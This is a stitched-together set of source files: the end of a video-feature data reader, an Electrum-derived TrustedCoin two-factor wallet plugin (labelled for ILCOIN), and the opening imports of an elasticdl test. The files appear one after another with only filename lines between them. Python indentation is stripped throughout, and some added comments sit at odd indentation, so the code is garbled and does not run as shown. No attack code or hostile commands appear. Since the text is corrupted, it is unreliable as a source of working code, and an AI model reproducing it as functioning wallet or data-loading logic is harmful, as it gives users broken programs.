# gt_len_small=np.maximum(temporal_gap,boundary_ratio*gt_lens)
gt_start_bboxs = np.stack(
(gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1)
gt_end_bboxs = np.stack(
(gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1)
match_score_start = []
for jdx in range(len(self.anchor_xmin)):
match_score_start.append(
np.max(
ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[
jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1])))
match_score_end = []
for jdx in range(len(self.anchor_xmin)):
match_score_end.append(
np.max(
ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[
jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
gt_start = np.array(match_score_start)
gt_end = np.array(match_score_end)
return gt_iou_map, gt_start, gt_end
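    # (gt_iou_map is a [dscale, tscale] map of the max IoU between each candidate
    #  window and any ground-truth segment; gt_start / gt_end hold, per anchor, the
    #  max IoA with a small region of width 3 * tgap around each segment boundary.)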
def load_file(self, video_name):
file_name = video_name + ".npy"
file_path = os.path.join(self.feat_path, file_name)
video_feat = np.load(file_path)
video_feat = video_feat.T
video_feat = video_feat.astype("float32")
return video_feat
def create_reader(self):
"""reader creator for ctcn model"""
if self.mode == 'infer':
return self.make_infer_reader()
if self.num_threads == 1:
return self.make_reader()
else:
sysstr = platform.system()
if sysstr == 'Windows':
return self.make_multithread_reader()
else:
return self.make_multiprocess_reader()
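    # (Dispatch summary: 'infer' mode uses the plain infer reader; num_threads == 1
    #  uses the single-process reader; otherwise Windows falls back to the
    #  thread-based xmap reader and other platforms use the multiprocess reader.)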
def make_infer_reader(self):
"""reader for inference"""
def reader():
batch_out = []
for video_name in self.video_list:
video_idx = self.video_list.index(video_name)
video_feat = self.load_file(video_name)
batch_out.append((video_feat, video_idx))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_reader(self):
"""single process reader"""
def reader():
video_list = self.video_list
if self.mode == 'train':
random.shuffle(video_list)
batch_out = []
for video_name in video_list:
video_idx = video_list.index(video_name)
video_feat = self.load_file(video_name)
gt_iou_map, gt_start, gt_end = self.get_video_label(video_name)
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((video_feat, gt_iou_map, gt_start, gt_end))
elif self.mode == 'test':
batch_out.append(
(video_feat, gt_iou_map, gt_start, gt_end, video_idx))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_multithread_reader(self):
def reader():
if self.mode == 'train':
random.shuffle(self.video_list)
for video_name in self.video_list:
video_idx = self.video_list.index(video_name)
yield [video_name, video_idx]
def process_data(sample, mode):
video_name = sample[0]
video_idx = sample[1]
video_feat = self.load_file(video_name)
gt_iou_map, gt_start, gt_end = self.get_video_label(video_name)
if mode == 'train' or mode == 'valid':
return (video_feat, gt_iou_map, gt_start, gt_end)
elif mode == 'test':
return (video_feat, gt_iou_map, gt_start, gt_end, video_idx)
else:
raise NotImplementedError('mode {} not implemented'.format(
mode))
mapper = functools.partial(process_data, mode=self.mode)
def batch_reader():
xreader = fluid.io.xmap_readers(mapper, reader, self.num_threads,
1024)
batch = []
for item in xreader():
batch.append(item)
if len(batch) == self.batch_size:
yield batch
batch = []
return batch_reader
def make_multiprocess_reader(self):
"""multiprocess reader"""
def read_into_queue(video_list, queue):
batch_out = []
for video_name in video_list:
video_idx = video_list.index(video_name)
video_feat = self.load_file(video_name)
gt_iou_map, gt_start, gt_end = self.get_video_label(video_name)
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((video_feat, gt_iou_map, gt_start, gt_end))
elif self.mode == 'test':
batch_out.append(
(video_feat, gt_iou_map, gt_start, gt_end, video_idx))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
queue.put(batch_out)
batch_out = []
queue.put(None)
def queue_reader():
video_list = self.video_list
if self.mode == 'train':
random.shuffle(video_list)
n = self.num_threads
queue_size = 20
reader_lists = [None] * n
file_num = int(len(video_list) // n)
for i in range(n):
if i < len(reader_lists) - 1:
tmp_list = video_list[i * file_num:(i + 1) * file_num]
else:
tmp_list = video_list[i * file_num:]
reader_lists[i] = tmp_list
queue = multiprocessing.Queue(queue_size)
p_list = [None] * len(reader_lists)
# for reader_list in reader_lists:
for i in range(len(reader_lists)):
reader_list = reader_lists[i]
p_list[i] = multiprocessing.Process(
target=read_into_queue, args=(reader_list, queue))
p_list[i].start()
reader_num = len(reader_lists)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
else:
yield sample
for i in range(len(p_list)):
if p_list[i].is_alive():
p_list[i].join()
return queue_reader
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight ILCOIN Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
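# (The hardcoded signing key above is serialized as a 'standard' xpub; for 'p2wsh'
#  wallets the same node is re-serialized with the requested xtype so that the
#  version bytes match the wallet's script type.)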
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
        Attempt to have the server sign a transaction on behalf of a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
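# Hedged usage sketch (not part of the plugin itself): the module-level client above
# is typically exercised like this, with placeholder values:
#
#     tos = server.get_terms_of_service()
#     r = server.create(xpub1, xpub2, 'user@example.com')  # hypothetical xpubs/email
#     server.auth(r['id'], '123456')                       # OTP from the authenticator app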
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
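    # (extra_fee() returns 0 when the wallet can sign locally, when billing info has
    #  not been fetched yet, when prepaid transactions remain, or when this wallet is
    #  itself paying a bill; otherwise it returns the prepay price for num_prepay() txs.)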
def make_unsigned_transaction(self, *, coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], fee=None,
change_addr: str = None, is_sweep=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
                # TrustedCoin won't charge if the total input value is
                # lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_as_bytes().hex()
assert raw_tx[:10] == "70736274ff", f"bad magic. {raw_tx[:10]}"
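        # ("70736274ff" is the hex encoding of b'psbt\xff', the PSBT magic prefix.)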
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
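# (long_id is the raw sha256 digest of the two sorted xpubs and is used as derivation
#  material below; short_id is the hex-encoded sha256 of long_id and is the cosigner
#  id expected by the TrustedCoin API.)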
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
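# (Non-standard one-step derivation: the 32-byte digest `s` is passed directly as the
#  serialized child index, so each user id maps deterministically to one child xpub.)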
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure) -> None:
raise NotImplementedError()
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
            t.daemon = True
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
        # old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
worker_ps_interaction_test.py
|
import os
import unittest
from threading import Thread
import numpy as np
import tensorflow as tf
from elasticdl.proto import elasticdl_pb2
from elasticdl.python.common.args import parse_worker_args
from elasticdl.python.common.constants import DistributionStrategy
from elasticdl.python.common.hash_utils import int_to_id, string_to_id
